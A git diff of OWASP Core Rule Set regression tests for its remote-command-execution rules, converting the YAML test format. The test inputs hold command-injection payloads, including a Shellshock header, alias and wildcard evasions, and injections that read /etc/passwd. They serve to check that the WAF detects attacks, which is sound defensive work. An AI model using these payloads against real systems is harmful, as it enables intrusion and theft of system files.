text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Test: () { - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932170" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Test: () { + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932170" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml index 71572eddb..9fefdbbb8 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932171.yaml @@ -2,40 +2,37 @@ meta: author: "Franziska Bühler, azurit" description: "Remote Command Execution: Shellshock (CVE-2014-6271)" - enabled: true - name: 932171.yaml +rule_id: 932171 tests: - - test_title: 932171-1 + - test_id: 1 desc: "Test for '() {' in ARGS_NAMES" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" - - test_title: 932171-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?%28%29%20%7B" + version: HTTP/1.0 + output: + log_contains: id "932171" + - test_id: 2 desc: "Test for '() {' in ARGS" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?arg=%28%29%20%7B" - version: HTTP/1.0 - output: - log_contains: id "932171" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?arg=%28%29%20%7B" + version: HTTP/1.0 + output: + log_contains: id "932171" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml index 790b5740a..b8e7354c2 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932175.yaml @@ -2,272 +2,256 @@ meta: author: "Felipe Zipitria, azurit" description: "Remote Command Execution: shell aliasing detection" - enabled: true - name: 932175.yaml +rule_id: 932175 tests: - - test_title: 932175-1 + - test_id: 1 desc: "Test for 0FA9HCGT alias eennvv=env&eennvv whoami" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20eennvv%3Denv%26eennvv%20whoami" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 2 desc: "Test for alias with shell tricks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias a=c${KK}url&a google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias a=c${KK}url&a google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 3 desc: "Test for alias name with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias 'letter'=curl&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias 'letter'=curl&letter google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 4 desc: "Test for alias name with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias "quote"=curl"e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias "quote"=curl"e google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 5 desc: "Test for alias value with single quoting" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias alias='curl'&letter google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias alias='curl'&letter google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 6 desc: "Test for alias value with double quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias double="curl""e google.com - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias double="curl""e google.com + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 7 desc: "Negative test alias" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=I%20see%2C%20so%20your%20alias%20is%20not%20%3D%20to%20your%20name" + version: HTTP/1.1 + output: + no_log_contains: id "932175" + - test_id: 8 desc: "Negative test alias with quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." - version: HTTP/1.1 - output: - no_log_contains: id "932175" - - test_title: 932175-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + "text=The%20pizza%20vendor%20was%20known%20by%20the%20alias%20%22pineapple%22%20online." + version: HTTP/1.1 + output: + no_log_contains: id "932175" + - test_id: 9 desc: "Status Page Test - Test for simple alias example" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=alias%20a=b" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-10 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=alias%20a=b" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 10 desc: "Test for alias with -p argument" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -p jzfrx=id - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-11 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -p jzfrx=id + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 11 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias -gmr a=b - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-12 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias -gmr a=b + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 12 desc: | Test for alias with zsh '+' flags. Payload: "alias +m a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-13 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%6d%20%61%3d%62" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 13 desc: | Test for alias with trailing '+' in a flag. Payload: "alias +g+ a=b" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-14 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?rce=%61%6c%69%61%73%20%2b%67%2b%20%61%3d%62" + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 14 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ls-al='ls -al' - version: HTTP/1.1 - output: - log_contains: id "932175" - - test_title: 932175-15 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ls-al='ls -al' + version: HTTP/1.1 + output: + log_contains: id "932175" + - test_id: 15 desc: "Test for alias with zsh flags" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - rce=alias ..='cd ..' - version: HTTP/1.1 - output: - log_contains: id "932175" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + rce=alias ..='cd ..' + version: HTTP/1.1 + output: + log_contains: id "932175" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml index 5784dde62..856f3ea8d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932180.yaml @@ -2,82 +2,78 @@ meta: author: "Franziska Bühler, azurit" description: "Restricted File Upload Attempt" - enabled: true - name: 932180.yaml +rule_id: 932180 tests: - - test_title: 932180-1 + - test_id: 1 desc: "Test file upload with request header X-Filename and filename settings.php" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - X-Filename: settings.php - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "932180" - - test_title: 932180-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + X-Filename: settings.php + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log_contains: id "932180" + - test_id: 2 desc: "Test file upload with multipart/form-data and filename config.yml" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="config"; filename="config.yml" - Content-Type: text/yaml + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="config"; filename="config.yml" + Content-Type: text/yaml - ... Some content ... - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.png" - Content-Type: image/png + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.png" + Content-Type: image/png - BINARYDATA - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- - output: - log_contains: id "932180" - - test_title: 932180-3 + BINARYDATA + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ-- + output: + log_contains: id "932180" + - test_id: 3 desc: "File upload - negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - Content-Disposition: form-data; name="image"; filename="test.jpg" - Content-Type: image/jpeg + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABCDEFGIJKLMNOPQ + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + Content-Disposition: form-data; name="image"; filename="test.jpg" + Content-Type: image/jpeg - ... Some content ... - ------WebKitFormBoundaryABCDEFGIJKLMNOPQ + ... Some content ... + ------WebKitFormBoundaryABCDEFGIJKLMNOPQ - BINARYDATA - --0000-- - output: - no_log_contains: id "932180" + BINARYDATA + --0000-- + output: + no_log_contains: id "932180" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml index bb7f0da09..0ad487b6d 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932190.yaml @@ -2,112 +2,105 @@ meta: author: "Franziska Bühler, Max Leske, azurit" description: "Remote Command Execution: Wildcard bypass technique attempt" - enabled: true - name: 932190.yaml +rule_id: 932190 tests: - - test_title: 932190-1 + - test_id: 1 desc: "Match wild card evasion in 'cat+/et*/*wd'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2Fet*%2F*wd" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2Fet*%2F*wd" + version: HTTP/1.0 + output: + log_contains: id "932190" + - test_id: 2 desc: "Match wild card evasion in 'cat+/ET*/*WD'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=cat%2B%2FET*%2F*WD" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=cat%2B%2FET*%2F*WD" + version: HTTP/1.0 + output: + log_contains: id "932190" + - test_id: 3 desc: "Match wild card evasion in '/???/?s'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" - version: HTTP/1.0 - output: - log_contains: id "932190" - - test_title: 932190-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=%2F%3F%3F%3F%2F%3Fs" + version: HTTP/1.0 + output: + log_contains: id "932190" + - test_id: 4 desc: "No FP in 'Does the * shine bright?'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" - version: HTTP/1.0 - output: - no_log_contains: id "932190" - - test_title: 932190-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?id=Does%20the%20%2A%20shine%20bright%3F" + version: HTTP/1.0 + output: + no_log_contains: id "932190" + - test_id: 5 desc: "Handle single quote evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" - output: - log_contains: id "932190" - - test_title: 932190-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e't'*/pa'?s'wd\"}" + output: + log_contains: id "932190" + - test_id: 6 desc: "Handle backslash evasion mixed with wild card evasion" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Host: localhost - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - Content-Type: application/json - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" - output: - log_contains: id "932190" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Host: localhost + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + Content-Type: application/json + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + data: "{\"foo\" : \";+cat+/e\\\\t\\\\*/pa\\\\?s\\\\wd\"}" + output: + log_contains: id "932190" diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml index ba760012d..78c7f5ec9 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932200.yaml @@ -2,265 +2,248 @@ meta: author: "theMiddle, Franziska Bühler, Max Leske, azurit" description: RCE Bypass - enabled: true - name: 932200.yaml +rule_id: 932200 tests: - - test_title: 932200-1 + - test_id: 1 desc: globbing patterns stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;/bin/ca?+/et*/passwd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 2 desc: uninitialized variable stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%7Ba%7Dpasswd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 3 desc: bash function stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?host=www.google.com;cat+/etc/%24%28echo%29passwd" + version: HTTP/1.0 + output: + log_contains: id "932200" + - test_id: 4 desc: uninitialized vars stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?host=www.google.com;c%24%40at%2B%2Fet%24%40c%2Fpas%24%40swd" - version: HTTP/1.0 - output: - log_contains: id "932200" - - test_title: 932200-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: 